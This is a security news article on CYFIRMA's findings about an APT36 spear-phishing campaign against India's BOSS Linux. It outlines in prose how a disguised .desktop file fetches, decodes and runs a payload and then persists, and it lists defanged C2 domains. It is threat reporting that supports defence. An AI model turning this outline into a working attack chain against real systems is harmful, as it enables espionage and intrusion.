The Pakistan-linked threat group APT36, also known as Transparent Tribe, has intensified its espionage efforts against India by deploying customized malware aimed directly at the BOSS Linux operating system.
According to researchers at CYFIRMA, this campaign, first observed in early August 2025, demonstrates a significant escalation in the group’s sophistication.
Traditionally reliant on Windows-based payloads and phishing documents, APT36 is now actively weaponizing BOSS-specific attack chains, a worrying development given the system’s widespread use across Indian government entities.
The attack commences through spear-phishing emails that deliver a compressed archive, concealing a malicious .desktop file disguised as an official government notice.
When opened, the file executes stealthy command sequences that initiate the download and execution of a hidden binary, while simultaneously presenting the victim with a harmless PDF decoy to maintain the illusion of legitimacy.
Malicious Shortcuts Deliver Stealthy ELF Payloads
The centerpiece of the campaign is the .desktop file, crafted to resemble a legitimate PDF shortcut but laced with commands in its Exec field.
Once launched, it leverages utilities such as curl and xxd to fetch a hex-encoded payload from the attacker infrastructure, decode it into binary form, and store it under /tmp, and activate it in the background with execution rights silently granted via chmod.
This mechanism ensures the malware runs covertly, without presenting any visible terminal window. To secure persistence, the attackers exploit autostart entries that re-trigger the payload each time the user logs in.
Static analysis of the retrieved ELF executable reveals a Go-based binary with obfuscated headers and missing section names, traits commonly associated with packed or tampered malware.
More alarmingly, dynamic examination uncovered its reliance on systemd services and cron jobs for long-term persistence, in parallel with communication to a command-and-control node hosted at “modgovindia[.]space” on port 4000.
Additional infrastructure, including the newly registered domain “securestore[.]cv”, has been identified as part of the delivery chain, reinforcing the assessment of a coordinated state-backed operation.
Strategic Implications and Defensive Priorities
This latest campaign underscores a deliberate and evolving strategy by APT36 to infiltrate India’s technological backbone.
By expanding its toolkit to compromise BOSS Linux specifically, the group is aiming to undermine trust in homegrown operating systems deployed across defense, diplomatic, and critical administrative structures.
Researchers warn that the ability to run cross-platform espionage operations magnifies the potential for sustained access and data theft.
For Indian institutions, the implications are severe, as reliance on spear-phishing combined with Linux-specific persistence allows attackers to bypass traditional security controls that remain heavily tuned toward Windows environments.
CYFIRMA’s findings highlight the pressing need to revise defense-in-depth models, incorporating Linux-capable endpoint detection, stricter execution controls over untrusted shortcut files, and proactive blocking of known malicious domains.
APT36’s consistent focus on India reflects broader geopolitical motives, with each new iteration of its tactics reinforcing the necessity of a vigilant and adaptive security posture.
Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates
